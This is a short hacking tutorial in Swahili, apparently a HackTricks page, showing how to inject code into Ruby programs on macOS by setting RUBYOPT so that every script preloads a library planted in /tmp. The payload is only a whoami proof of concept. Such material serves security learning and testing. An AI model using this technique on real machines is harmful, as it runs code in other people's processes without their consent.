macOS Ruby Applications Injection

Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Ikiwa unataka kuona kampuni yako inatangazwa kwenye HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia MPANGO WA KUJIUNGA!
Pata swag rasmi wa PEASS & HackTricks
Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs ya kipekee
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa HackTricks na HackTricks Cloud repos za github.

RUBYOPT

Kwa kutumia hii mazingira ya pembejeo, ni inawezekana kuongeza vigezo vipya kwa ruby wakati wowote inapotekelezwa. Ingawa kigezo -e hakiwezi kutumika kuainisha nambari ya ruby ya kutekeleza, inawezekana kutumia vigezo -I na -r kuongeza saraka mpya kwenye njia ya kupakia maktaba na kisha kuainisha maktaba ya kupakia.

Unda maktaba inject.rb kwenye /tmp:

inject.rb

puts `whoami`

Tengeneza skripti ya ruby mahali popote kama:

hello.rb

puts 'Hello, World!'

Kisha tengeneza skripti ya ruby isiyojulikana na uipakie kwa:

RUBYOPT="-I/tmp -rinject" ruby hello.rb

Ukweli wa kufurahisha, inafanya kazi hata na param --disable-rubyopt:

RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Ikiwa unataka kuona kampuni yako ikionekana kwenye HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia MPANGO WA KUJIUNGA!
Pata swag rasmi ya PEASS & HackTricks
Gundua The PEASS Family, mkusanyiko wetu wa NFTs za kipekee
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye HackTricks na HackTricks Cloud repos za github.

PreviousmacOS Python Applications Injection NextmacOS .Net Applications Injection

Last updated 2 months ago